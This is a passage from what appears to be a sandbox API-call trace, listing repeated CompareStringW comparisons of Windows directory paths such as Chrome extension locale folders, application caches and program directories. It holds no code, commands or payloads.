lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\", cchCount2=130) returned 1 [0276.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\", cchCount1=133, lpString2="C:\\Users\\All Users\\USOShared\\Logs\\", cchCount2=34) returned 3 [0276.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\", cchCount1=118, lpString2="C:\\Users\\All Users\\USOShared\\Logs\\", cchCount2=34) returned 3 [0276.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\", cchCount1=72, lpString2="C:\\Users\\All Users\\USOShared\\Logs\\", cchCount2=34) returned 1 [0276.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", cchCount1=68, lpString2="C:\\Users\\All Users\\USOShared\\Logs\\", cchCount2=34) returned 3 [0276.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\USOShared\\Logs\\", cchCount1=34, lpString2="C:\\Users\\All Users\\USOShared\\Logs\\", cchCount2=34) returned 2 [0276.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\", cchCount2=130) returned 1 [0276.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\", cchCount2=130) returned 3 [0276.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\", cchCount2=130) returned 3 [0276.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\", cchCount2=130) returned 1 [0276.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\", cchCount2=130) returned 1 [0276.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\", cchCount2=131) returned 1 [0276.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\", cchCount2=131) returned 1 [0276.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\", cchCount2=131) returned 3 [0276.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\", cchCount2=131) returned 3 [0276.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\", cchCount2=131) returned 1 [0276.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\", cchCount2=128) returned 1 [0276.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\", cchCount2=128) returned 1 [0276.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\", cchCount2=128) returned 1 [0276.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\", cchCount2=128) returned 1 [0276.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\", cchCount2=128) returned 1 [0276.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\", cchCount2=128) returned 1 [0276.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\", cchCount2=130) returned 1 [0276.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\", cchCount2=130) returned 1 [0276.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\", cchCount2=130) returned 3 [0276.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\", cchCount2=130) returned 1 [0276.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\", cchCount2=130) returned 1 [0276.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\", cchCount2=130) returned 3 [0276.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\", cchCount2=130) returned 3 [0276.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\", cchCount2=130) returned 1 [0276.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\", cchCount2=130) returned 3 [0276.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\", cchCount2=130) returned 1 [0276.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\", cchCount2=130) returned 1 [0276.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\", cchCount2=130) returned 1 [0276.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\", cchCount2=131) returned 1 [0276.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\", cchCount2=131) returned 3 [0276.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\", cchCount2=131) returned 1 [0276.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\", cchCount1=135, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\", cchCount2=131) returned 1 [0276.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\", cchCount2=131) returned 1 [0276.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\", cchCount2=131) returned 3 [0276.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\Cache\\", cchCount2=59) returned 3 [0276.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\Cache\\", cchCount2=59) returned 3 [0276.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\USOShared\\Logs\\", cchCount1=34, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\Cache\\", cchCount2=59) returned 1 [0276.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount1=74, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\Cache\\", cchCount2=59) returned 3 [0276.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", cchCount1=68, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\Cache\\", cchCount2=59) returned 3 [0276.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\", cchCount2=129) returned 1 [0276.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\", cchCount2=129) returned 1 [0276.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\", cchCount2=129) returned 3 [0276.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\", cchCount2=129) returned 3 [0276.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\", cchCount2=129) returned 3 [0276.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\", cchCount1=130, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\", cchCount2=63) returned 3 [0276.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\", cchCount1=130, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\", cchCount2=63) returned 3 [0276.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\USOShared\\Logs\\", cchCount1=34, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\", cchCount2=63) returned 3 [0276.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\", cchCount1=118, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\", cchCount2=63) returned 3 [0276.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\", cchCount2=63) returned 3 [0276.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\", cchCount2=118) returned 3 [0276.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\", cchCount1=118, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\", cchCount2=118) returned 1 [0276.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\", cchCount2=118) returned 1 [0276.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\", cchCount2=118) returned 1 [0276.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\", cchCount2=118) returned 1 [0276.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\", cchCount2=118) returned 1 [0276.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\", cchCount2=118) returned 1 [0276.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\", cchCount2=118) returned 1 [0276.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\", cchCount1=130, 